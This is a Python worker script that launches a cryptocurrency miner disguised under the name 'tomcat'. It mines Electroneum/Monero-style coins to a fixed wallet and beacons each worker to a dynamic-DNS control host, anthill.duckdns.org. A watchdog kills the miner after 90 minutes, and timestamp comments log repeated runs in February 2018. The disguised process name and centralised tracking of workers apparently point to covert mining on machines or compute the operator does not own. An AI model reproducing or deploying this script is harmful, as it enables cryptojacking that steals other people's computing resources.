import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:03.421681
#2018-02-17 17:28:03.957435
#2018-02-17 19:16:01.422415
#2018-02-17 21:04:06.329457
#2018-02-17 22:49:03.075431
#2018-02-18 00:34:02.201843
#2018-02-18 02:24:06.251347
#2018-02-18 04:12:06.379667
#2018-02-18 06:03:07.238682
#2018-02-18 07:54:06.766567
#2018-02-18 09:43:05.521760
#2018-02-18 11:29:03.402903
#2018-02-18 13:15:05.597719
#2018-02-18 15:03:06.760323
#2018-02-18 16:51:05.990066
#2018-02-18 18:39:04.155124
#2018-02-18 20:27:05.314709
#2018-02-18 22:13:06.263001
#2018-02-19 00:03:07.059949
#2018-02-19 01:48:06.979472
#2018-02-19 03:35:06.975184
#2018-02-19 05:20:05.790042
#2018-02-19 07:08:01.475757
#2018-02-19 08:56:06.606370
#2018-02-19 10:45:04.207453
#2018-02-19 12:34:02.172007
#2018-02-19 14:23:08.738630
#2018-02-19 16:13:01.665839
#2018-02-19 17:59:04.844900
#2018-02-19 19:48:06.299199
#2018-02-19 21:35:07.248420
#2018-02-19 23:22:06.931894
#2018-02-20 01:09:07.622679
#2018-02-20 02:58:04.147782
#2018-02-20 04:45:06.595402
#2018-02-20 06:29:05.174505
#2018-02-20 08:14:01.703774
#2018-02-20 09:59:05.008120
#2018-02-20 11:43:05.055693
#2018-02-20 13:31:07.897621
#2018-02-20 15:15:09.682944
#2018-02-20 16:59:10.691686
#2018-02-20 18:47:08.769912
#2018-02-20 20:37:06.295512
#2018-02-20 22:22:01.448339
#2018-02-21 00:03:01.898511
#2018-02-21 01:48:03.444986
#2018-02-21 03:36:08.111723
#2018-02-21 05:26:05.022318
#2018-02-21 07:13:01.912160
#2018-02-21 08:59:04.444609
#2018-02-21 10:49:07.629898
#2018-02-21 12:35:08.916409
#2018-02-21 14:22:04.573349
#2018-02-21 16:08:06.092471
#2018-02-21 17:59:08.822192
#2018-02-21 19:44:07.008055
#2018-02-21 21:32:08.783065
#2018-02-21 23:19:03.723276
#2018-02-22 01:09:04.197954
#2018-02-22 02:56:06.702843
#2018-02-22 04:49:06.026274
#2018-02-22 06:34:01.396174
#2018-02-22 08:21:07.239646
#2018-02-22 10:09:06.197937
#2018-02-22 11:55:07.367259
#2018-02-22 13:41:09.576541
#2018-02-22 15:30:05.503664
#2018-02-22 17:19:09.162665
#2018-02-22 19:06:10.680973
#2018-02-22 20:57:08.470254
#2018-02-22 22:44:02.155342
#2018-02-23 00:31:01.906479
#2018-02-23 02:16:07.841598
#2018-02-23 04:05:08.167614
#2018-02-23 05:52:01.750109
#2018-02-23 07:41:07.395766
#2018-02-23 09:46:06.546504
#2018-02-23 11:47:04.571781
#2018-02-23 13:38:01.617543
#2018-02-23 15:27:07.355484
#2018-02-23 17:18:07.203783
#2018-02-23 19:02:08.745752
#2018-02-23 20:49:06.932354
#2018-02-23 22:35:03.642582
#2018-02-24 00:21:03.304164
#2018-02-24 02:12:06.148577
#2018-02-24 04:01:01.444183
#2018-02-24 05:46:03.528899
#2018-02-24 07:38:04.117737
#2018-02-24 09:23:06.015720
#2018-02-24 11:17:06.747926
#2018-02-24 13:06:04.374944
#2018-02-24 14:57:07.510452
#2018-02-24 16:48:06.127687
#2018-02-24 18:36:04.434717
#2018-02-24 20:25:05.620247
#2018-02-24 22:21:04.803395
#2018-02-25 01:29:03.884284
#2018-02-25 05:22:02.162634
#2018-02-25 11:34:01.777984